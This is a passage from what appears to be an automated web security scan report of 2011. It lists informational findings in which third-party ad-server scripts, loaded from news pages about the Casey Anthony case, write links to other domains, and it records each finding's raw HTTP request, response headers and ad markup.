Set-Cookie:PRpc=|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><object id='prflsD8A2040063408A460309A4900C6C0200' name='prflsD8A2040063408A460309A4900C6C0200' classid=clsid:D27CDB6E-AE6D-11cf-96B8-444553540000 codebase=http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0 width='300' height='600' style='width:300px;height:600px'><param name='movie' value='http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/866972/superfans_eric_banner_300x600_r02.swf?PRCampID=39497&PRPubID=colmed&PRAdSize=300x600&PRFormat=FA&PRAd=147
...[SNIP]...

15.11. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /adserver/ako?rsi_random=208878393&rsi_pub=E083D538668BB69EC4795771A0EDA581&rsi_site=626E5E04865D079794DE6011BF30AD87&rsi_width=728&rsi_height=90&rsi_secure=0&rsi_url=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&rsi_referrer=&rsi_title=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C%20enrages%20%7C%20FLORIDA%20TODAY%20%7C%20floridatoday.com&rsi_inf=0 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decdd4f&0&&4dc619e1&271d956a153787d6fee9112e9c6a9326; rsiPus_oJ6I="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"; rsi_us_1000000="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"; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; 
rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; 
udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="...[SNIP]..."; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages"><'+'/script>
...[SNIP]...

15.12. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=714;misc=1304949656864 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 499

document.write('<a href="http://adserver.adtech.de/?adlink|826|2874578|0|2530|AdId=6218236;BnId=1;itime=949673789;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/508/Ad6218236St1Sz2530Sq100310965V0Id1.jpg" border=0 alt="Click here!" width="219" height="90"></a>
...[SNIP]...

15.13. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=714;misc=1304949656462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 496

document.write('<a href="http://adserver.adtech.de/?adlink|826|2874579|0|225|AdId=6346446;BnId=1;itime=949671473;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/206/Ad6346446St1Sz225Sq100487590V0Id1.gif" border=0 alt="Click here!" width="728" height="90"></a>
...[SNIP]...

15.14. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.3227309067733586&p=1426&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_05%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:11 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1182
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_05\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="125" height="125">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/125x125MayJune.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404124%26n%3D225569%26d%3D654194%26
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/125x125MayJune.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404124%26n%3D225569%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="125" height="125" name="ad_05_Parkview_May_June" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...

15.15. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.47879663039930165&p=351&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27headerpromo%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:06 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 459
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27headerpromo\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=390604&n=218584&d=654194&c=3031" target="_top" id="cmSK-placement-351" cmSKpID="351" cmSKcID="218584" cmSKaID="390604"><img src="http://media.indianasnewscenter.com/casimages/232x90HalfPrice1.jpg" border="0" height="90" width="232" alt="Half Price Deals on Fort Wayne!"/></a>
...[SNIP]...

15.16. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.7541181682609022&p=1461&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_12%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1185
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_12\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="300" height="250">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/luth_sleep_ad_inc.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D402659%26n%3D224819%26d%3D654194
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/luth_sleep_ad_inc.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D402659%26n%3D224819%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="300" height="250" name="ad_12_LHN_Sleep_4.25" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...

15.17. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.845637274440378&p=1421&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_04%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:10 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 419
X-Server-Name: dv-c1-r1-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_04\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=398234&n=222839&d=654194&c=3031" target="_blank" id="cmSK-placement-1421" cmSKpID="1421" cmSKcID="222839" cmSKaID="398234"><img src="http://media.indianasnewscenter.com/casimages/DaVita125x125r.jpg" border="0" height="125" width="125" /></a>
...[SNIP]...

15.18. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.998735488159582&p=1436&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_07%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1178
X-Server-Name: dv-c1-r1-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_07\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="468" height="60">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/468x60MayJune.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404129%26n%3D225574%26d%3D654194%26c
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/468x60MayJune.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404129%26n%3D225574%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="468" height="60" name="ad_07_Parkview_May_June" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...

15.19. http://cas.clickability.com/cas/cas.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.6105569114442915&p=1456&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_11%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 428
X-Server-Name: dv-c1-r3-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_11\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=402639&n=224804&d=654194&c=3031" target="_blank" id="cmSK-placement-1456" cmSKpID="1456" cmSKcID="224804" cmSKaID="402639"><img src="http://media.indianasnewscenter.com/casimages/TRAALC_WebBanner300x250.jpg" border="0" height="250" width="300" /></a>
...[SNIP]...

15.20. http://choices.truste.com/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl728x90&c=att02cont3&w=728&h=90&ox=20&zi=10002&plc=tr&iplc=ctr&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/COM/iview/286738708/direct;wi.728;hi.90/01?click=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F2%2C13%253B543fcfdf7fc5a5a2%253B12fd50f27eb%2C0%253B%253B%253B2045613379%2CqgEAAAaQGwAUf3sAAAAAAKfzHgAAAAAAAgEAAAYAAAAAAP8AAAACCo0ELQAAAAAAdgMpAAAAAABEySgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnlhEAAAAAAAIAAwAAAAAA6icP1S8BAAAAAAAAAGIyNTgwZDA2LTdhNDQtMTFlMC1iM2UxLWNmYTM2ZmYyM2UwNwBEiQEAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Efloridatoday%2Ecom%252Farticle%252F20110508%252Fnews01%252F105080319%252Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13049496301806342-86546%26campID%3D64375%26crID%3D86546%26pubICode%3D2687862%26pub%3D347615%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fwww%2Efloridatoday%2Ecom%2Farticle%2F20110508%2Fnews01%2F105080319%2Fhighly%2Dpublicized%2Dmurder%2Dcaylee%2Danthony%2Drivets%2Denrages%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
